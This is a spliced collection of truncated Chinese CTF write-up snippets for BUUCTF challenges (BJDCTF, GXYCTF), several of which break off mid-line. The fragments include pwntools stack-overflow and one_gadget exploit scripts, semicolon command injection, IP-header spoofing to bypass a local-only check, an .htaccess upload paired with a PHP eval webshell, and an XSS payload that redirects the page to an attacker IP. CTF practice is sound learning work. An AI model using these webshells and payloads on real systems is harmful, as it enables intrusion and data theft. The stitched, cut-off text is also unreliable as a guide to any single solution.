bjdctf_2020_router 查看保护 任意命令执行,用;号可以直接运行第二条命令。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 25996) e
bjdctf_2020_babystack ret2text exp: from pwn import * import time context.log_level = 'debug' sh = remote('node4.buuoj.cn', 27865) p_backdoor = 0x00000000004006E6 sh.recv() sh.send(b'100\n') sh.recv() payload = 0x
抓个登录时的包发现L0g1n.php 抓个L0g1n.php的包 提示我们99年才能进去,所以把时间调到尽可能大: 发现提示发生变化,说只有本机才能进去,我们先用修改X-Forwarded-For尝试一下 发现XFF被过滤,尝试用Client-ip或者X-Real-ip来进行登录: 成功,发现提示发生变化,需要我们是来自gem-
64位,放进ida看看 看一看这个main方法,要我们输入一个gadget,然后它回打印出来,再来看看init方法 用onegadget看看libc one_gadget libc-2.29.so 发现 写脚本 from pwn import * r=remote("node3.buuoj.cn",27772) elf=ELF("./one_gadget") libc=ELF('libc-2.29.so') one_g
题目 【Buuctf】[BJDCTF 2nd]elementmaster 分析 先查看源代码,hiddden id就很奇怪 506F2E,百度一查,蹦出来个颜色十六进制,那么应该就是十六进制转换了,转换数字没意义,转文本试试看 访问Po.php 得到一个点,页面中啥也没有 试试看别的元素,全部是404 一个个试工作量太大,用脚本 最
先放进ida里面,只发现2个函数,sub_10030和start: sub_10030是一个段内近调用(near)的无限死循环: 而start是一个调用sub_10030的函数(近似的认为start也为无限死循环): 既然flag不在这里,再去看汇编代码段: lea指令使bx赋值为aU…Wz的偏移地址。 loc_10039是一个循环,循环了cx(22h)次。
[BJDCTF 2nd]xss之光 御剑 看了一下url,输入啥都不对。掏出御剑直接扫,扫出一个.git GitHack安排 得到: <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 原生类反序列化 参考 构造payload: <?php $a = serialize(new Exception("<script>window.location.href='IP&#
查看题目 一只有鸡腿,一只没有鸡腿。很容易想到二进制数0,1。 将图片用二进制表示为: 01000010 01001010 01000100 01111011 01001101 00100001 01100001 00110000 01111110 01111101 将二进制数转为16进制进制转换,再16进制转文本16转文。 得到flag为: BJD{M!a0~}
[GXYCTF2019]BabyUpload .htaccess 记得绕过Content-Type:image/jpeg <FilesMatch "h3zh1.jpg"> SetHandler application/x-httpd-php </FilesMatch> h3zh1.jpg <script language="php"> eval($_POST['cmd']); </
先贴一下Y1ng大佬的WP 脑洞确实大,源码中hidden的id可以用hex解码成Po. 在URL后面输入Po.php得到一个点, 然后不知所措 被水淹没 实际上这里是要遍历化学元素周期表来获得全部的信息,最终获得flag 脚本如下 mport requests url='http://68607684-1f65-45a1-96b6-379176edb7
[BJDCTF]EasySearch 那天,我见过的最强剑客,提起了天下最强的宝剑······却早已没了剑心。 简单写!!! 继续记录一道BJDCTF的题目,打开环境,看到登陆页面,到后台发现swp泄露,直接访问,看到如下的源码,; 开始代码审计;;发现只要密码的md5加密前几位是要求的就可以登陆,这里我们跑脚本;脚本如下
exp脚本 这题的考点是整数溢出,我们通过输入 -1 绕过 if 判断,从而可以达到输入足够长数据的目的,然后题目给了后门函数,直接栈溢出控制返回地址返回后门函数即可。 from pwn import * p = remote('node3.buuoj.cn',25193) backdoor = 0x400726 p.sendline('-1') sleep(0.2) p.sen
exp 脚本 真的是 baby 难度,直接栈溢出跳转到后门函数 from pwn import * io = remote('node3.buuoj.cn',25930) backdoor = 0x4006e6 payload = 'a' * (0x10+8) + p64(backdoor) io.sendline('100') io.sendline(payload) io.interactive()
这道题其实主要考linux下的命令。我们来试一下!!! 可以看到,只要我们在命令之间加上分号,就可以既执行前面的命令,又执行后面的命令。。。 这道题就不看保护了,直接看一下关键的代码。 这里可以看到strcat就是在dest后面拼接buf,只要加个分号,下面就会随便又我们执行命
